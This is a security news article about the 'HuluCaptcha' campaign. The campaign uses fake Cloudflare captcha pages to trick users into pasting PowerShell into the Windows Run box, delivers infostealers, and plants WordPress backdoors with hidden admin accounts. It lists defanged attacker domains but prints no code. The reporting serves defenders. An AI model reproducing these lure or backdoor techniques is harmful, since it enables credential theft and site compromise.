HuluCaptcha Scam Uses Fake Captcha Kit to Execute Code via Windows Run Command

Security researchers have identified a sophisticated fake captcha attack framework dubbed “HuluCaptcha” that tricks users into executing malicious PowerShell commands through Windows Run dialog boxes, leading to deployment of information-stealing malware including Lumma Stealer and Aurotun Stealer.

The campaign begins when users visit compromised websites that redirect them to legitimate-looking Cloudflare security pages.

These fake captcha interfaces instruct victims to copy and paste PowerShell commands into the Windows Run command box (Win+R) under the guise of verifying their humanity.

The malicious JavaScript injection occurs through compromised WordPress sites, where attackers deploy sophisticated backdoors to maintain persistent access.

Advanced Tracking

The HuluCaptcha framework employs multiple layers of victim tracking and environmental checks before deployment.

The malicious code performs reconnaissance on the target system, specifically checking for Windows 10 operating systems and compatible browser versions including Microsoft Edge (v120-139), Google Chrome (v120-139), and Mozilla Firefox (v130-149). Only victims meeting these criteria are redirected to the fake captcha pages.

The framework includes comprehensive logging capabilities that track user interactions throughout the attack chain.

When victims click the captcha verification button, the system sends a “✅ Verify Clicked” message to tracking endpoints.

The code monitors for Windows key combinations and attempts to detect when users execute the fraudulent commands by tracking browser focus loss events.

Upon successful payload execution, the tracking server receives confirmation through IP-based verification mechanisms.

Payload Generation

Researchers discovered an unused but sophisticated payload generation system within the framework that creates randomized PowerShell commands to evade detection.

The system selects from nine different domains and ten command variations, potentially generating up to 90 unique payload combinations.

Commands are padded with whitespace characters to obscure their visibility in the Windows Run dialog, making detection more difficult for victims.

The attack infrastructure spans multiple domains serving different functions. Initial redirection occurs through domains like analytiwave[.]com and goclouder[.]com, while fake captcha pages are hosted on security-themed subdomains mimicking Cloudflare services.

Payload delivery utilizes domains such as amoliera[.]com and sopeited[.]com variants.

The framework also includes an apparent affiliate tracking system designed to monitor infection success rates across different distribution channels.

Investigation of compromised servers revealed sophisticated WordPress backdoors deployed as plugins with names like “core-handler” and “core-handler2.”

These backdoors create hidden administrator accounts (“backupsystems” and “adminbackup”) that remain invisible in standard WordPress admin interfaces.

The backdoors implement extensive hiding mechanisms, modifying SQL queries to exclude the malicious accounts from user listings, search results, and REST API responses.

They also include persistence mechanisms that automatically recreate accounts and reactivate plugins if removed.

The backdoors contain Russian language comments in their source code, suggesting possible attribution, though these were later removed in subsequent versions.

Multiple WordPress sites have reported similar infections through community forums, indicating an ongoing campaign affecting numerous targets.

Indicators of Compromise (IOCs)

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.